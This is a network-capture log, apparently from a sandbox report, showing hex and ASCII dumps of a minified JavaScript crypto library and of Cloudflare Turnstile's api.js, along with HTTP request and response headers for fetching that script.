2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63 3b Data Ascii: eof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4o),c=(s=t?h.ceil(s):h.max((0\|s)-this._minBufferSize,0))o,n=h.min(4*c,n);if(c){for(var a=0;a<c;
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e 30 Data Ascii: ar t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b\|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)\|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)\|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)\|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>0
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36 7c 49 5b 30 5d Data Ascii: or(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((nn>>>17)+no>>>15)+oo^((4294901760&i)i\|0)+((65535&i)*i\|0)}t[0]=I[0]+(I[7]<<16\|I[7]>>>16)+(I[6]<<16\|I[6]>>>16)\|0,t[1]=I[1]+(I[0]<<8\|I[0]>>>24)+I[7]\|0,t[2]=I[2]+(I[1]<<16\|I[1]>>>16)+(I[0]<<16\|I[0]
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69 66 79 3a 66 75 Data Ascii: ,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]\|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringify:fu
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 Data Ascii: arAt(64);return!o\|\|-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%42,c=r[t.charCodeAt(o)]>>>6-o%42,c=s\|c,i[n>>>2]\|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOPQ
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69 73 Data Ascii: .sin(t+1))\|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8\|n>>>24)\|4278255360&(n<<24\|n>>>8)}var o=this
2025-03-06 21:54:52 UTC	1369	IN	Data Raw: 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41 5b Data Ascii: ,m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A[

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:54:53 UTC	647	OUT	GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://t8ja.vyhbxyts.ru/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:54:54 UTC	471	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 21:54:54 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 48239 Connection: close accept-ranges: bytes last-modified: Fri, 28 Feb 2025 15:24:08 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 91c5181fe86e41f8-EWR alt-svc: h3=":443"; ma=86400
2025-03-06 21:54:54 UTC	898	IN	Data Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 76 29 2c 73 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 61 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 74 28 73 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 74 2c 61 29 3b 66 75 6e 63 74 Data Ascii: "use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);funct
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 49 72 28 65 2c 74 29 7b 76 61 72 20 61 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 69 74 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3d 74 21 3d 6e 75 Data Ascii: e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);t&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function it(e,t){return t=t!=nu
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 72 61 79 24 2f 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 6f 74 28 65 2c 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 7a 74 28 65 29 7c 7c 42 74 28 65 2c 74 29 7c 7c 58 74 28 65 2c 74 29 7c 7c 47 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 50 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 Data Ascii: ray$/.test(a))return ot(e,t)}}function Ie(e,t){return zt(e)\|\|Bt(e,t)\|\|Xt(e,t)\|\|Gt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Pe(e,t){var a={label:0,sent:function(){if(l[0
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 51 74 3d 33 30 30 30 32 30 3b 76 61 72 20 57 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Qt=300020;var We=300030;var Ue=300031;var q;(fu
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 65 65 7c 7c 28 65 65 3d 7b 7d 29 29 3b 76 61 72 20 63 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 65 76 65 72 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 61 6e 75 61 6c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 75 74 6f 3d 22 61 75 74 6f 22 7d 29 28 63 65 7c 7c 28 63 65 3d 7b 7d 29 29 3b 76 61 72 20 51 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 6c 77 61 79 73 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 78 65 63 75 74 65 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 6e 74 65 72 61 63 74 69 6f 6e 4f 6e 6c 79 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 51 7c 7c 28 51 3d 7b 7d 29 29 3b 76 61 72 20 6d 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 52 65 6e 64 65 72 Data Ascii: manual",e.Auto="auto"})(ee\|\|(ee={}));var ce;(function(e){e.Never="never",e.Manual="manual",e.Auto="auto"})(ce\|\|(ce={}));var Q;(function(e){e.Always="always",e.Execute="execute",e.InteractionOnly="interaction-only"})(Q\|\|(Q={}));var me;(function(e){e.Render
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 4d 2e 4e 6f 72 6d 61 6c 2c 4d 2e 43 6f 6d 70 61 63 74 2c 4d 2e 49 6e 76 69 73 69 62 6c 65 2c 4d 2e 46 6c 65 78 69 62 6c 65 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4c 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 4e 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 Data Ascii: unction pt(e){return L([M.Normal,M.Compact,M.Invisible,M.Flexible],e)}function vt(e){return L(["auto","manual","never"],e)}function mt(e){return L(["auto","manual","never"],e)}var Nr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e){return e==="auto"\|\|Nr.test
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 72 22 2c 22 72 6f 2d 72 6f 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 74 29 7b 76 61 72 20 61 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 22 3b 69 66 28 74 29 7b 76 61 72 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 76 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 41 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 Data Ascii: r","ro-ro"];function Tt(e,t){var a="https://challenges.cloudflare.com";if(t){var o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,v,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",A=a["feedback-enabled"]===!1?"
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 63 2c 6f 7d 2c 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 75 72 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 Data Ascii: ect.setPrototypeOf\|\|function(o,c){return o.__proto__=c,o},te(e,t)}function ur(e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,w
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 65 28 63 2c 6f 29 7d 2c 47 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 73 72 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 26 26 28 46 28 74 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 7a 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 42 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 Data Ascii: ,configurable:!0}}),te(c,o)},Ge(e)}function sr(e,t){return t&&(F(t)==="object"\|\|typeof t=="function")?t:ze(e)}function dr(e){var t=Be();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this
2025-03-06 21:54:54 UTC	1369	IN	Data Raw: 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 76 61 72 20 6f 3d 54 74 28 74 2e 70 61 72 61 6d 73 2c 21 31 29 2c 63 3d 22 68 2f 22 2e 63 6f 6e 63 61 74 28 22 67 22 2c 22 2f 22 29 2c 6c 2c 76 2c 68 3d 22 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 76 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 76 21 3d 3d 76 6f 69 64 20 30 3f 76 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 Data Ascii: unction(e,t,a){var o=Tt(t.params,!1),c="h/".concat("g","/"),l,v,h="".concat(o,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((v=t.params.theme)!==null&&v!==void 0?v:t.theme,"/").concat(

Timestamp	Bytes transferred	Direction	Data
2025-03-06 21:54:56 UTC	383	OUT	GET /turnstile/v0/g/f3b948d8acb8/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-03-06 21:54:56 UTC	471	IN	HTTP/1.1 200 OK Date: Thu, 06 Mar 2025 21:54:56 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 48239 Connection: close accept-ranges: bytes last-modified: Fri, 28 Feb 2025 15:24:08 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 91c5182e5ae541cd-EWR alt-svc: h3=":443"; ma=86400
